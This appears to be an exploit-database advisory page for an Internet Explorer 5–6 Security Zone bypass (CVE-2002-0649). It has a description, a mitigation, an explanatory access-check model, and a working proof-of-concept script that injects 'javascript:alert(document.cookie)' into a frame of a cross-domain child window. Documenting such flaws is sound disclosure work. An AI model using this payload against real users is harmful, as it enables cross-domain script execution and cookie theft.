vendor: Internet Explorer
by: SecurityFocus
CVSS: 7,5 (HIGH)
Security Zone Bypass
CWE: 264
Product Name: Internet Explorer
Affected Version From: MSIE 5.0
Affected Version To: MSIE 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

MSIE Security Zone Bypass Vulnerability

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the child belongs to another domain or Security Zone. It has been reported that these checks fail to occur when the parent accesses the frames of the child window's document. A parent window can therefore set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications: by setting the URL to the 'javascript' protocol, followed by the desired code, the parent can cause script code to be executed within the context of the child domain. Attackers may also execute script code within the 'My Computer' Zone, which may have more severe consequences.

Mitigation:

Ensure that all security checks are performed when opening a new window.
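
The gap described above, a check applied to the opened window but not to its frames, can be shown with a small model. This is an added example, not code from the advisory or from Internet Explorer; the window tree, host names and function names are hypothetical, and "domain" is approximated by URL origin.

```javascript
// Simplified model, not Internet Explorer's code. Documents are described by
// a URL and a Security Zone label; all host names are constructed samples.
const popup = {
  name: "popup", url: "http://forum.example/thread", zone: "Internet",
  frames: [
    { name: "popup.frames[0]", url: "http://forum.example/nav", zone: "Internet", frames: [] },
    { name: "popup.frames[1]", url: "http://ads.example/banner", zone: "Internet", frames: [] },
  ],
};

// The rule the advisory states: access is allowed only within the same
// domain (modelled here as URL origin) and the same Security Zone.
function sameContext(caller, target) {
  return new URL(caller.url).origin === new URL(target.url).origin &&
         caller.zone === target.zone;
}

// Flawed policy: the opened window is checked, its frames are not.
function flawedCheck(caller, target, depth) {
  return depth > 0 || sameContext(caller, target);
}

// Corrected policy: the same check at every level of the window tree.
function fixedCheck(caller, target, _depth) {
  return sameContext(caller, target);
}

// Walk the window tree and list every document in which `caller` would be
// allowed to run a javascript: URL under the given policy.
function scriptableTargets(caller, node, check, depth = 0) {
  const hits = check(caller, node, depth) ? [node.name] : [];
  for (const frame of node.frames) {
    hits.push(...scriptableTargets(caller, frame, check, depth + 1));
  }
  return hits;
}

// Constructed callers: one from an unrelated site, one from the popup's site.
const foreignOpener = { url: "http://other.example/page", zone: "Internet" };
const sameSiteOpener = { url: "http://forum.example/index", zone: "Internet" };

console.log("flawed:", scriptableTargets(foreignOpener, popup, flawedCheck));
console.log("fixed: ", scriptableTargets(foreignOpener, popup, fixedCheck));
console.log("same site, fixed:", scriptableTargets(sameSiteOpener, popup, fixedCheck));
```
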

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5672/info

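<script language="jscript">
// Runs once the parent page has finished loading.
onload=function () {
    // Open a page from another domain in a small child window.
    var oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVictim","width=100,height=100");
    // After 7 seconds, set the URL of the child's first frame to a javascript: URL.
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cookie)";
        },
        7000
    );
}
</script>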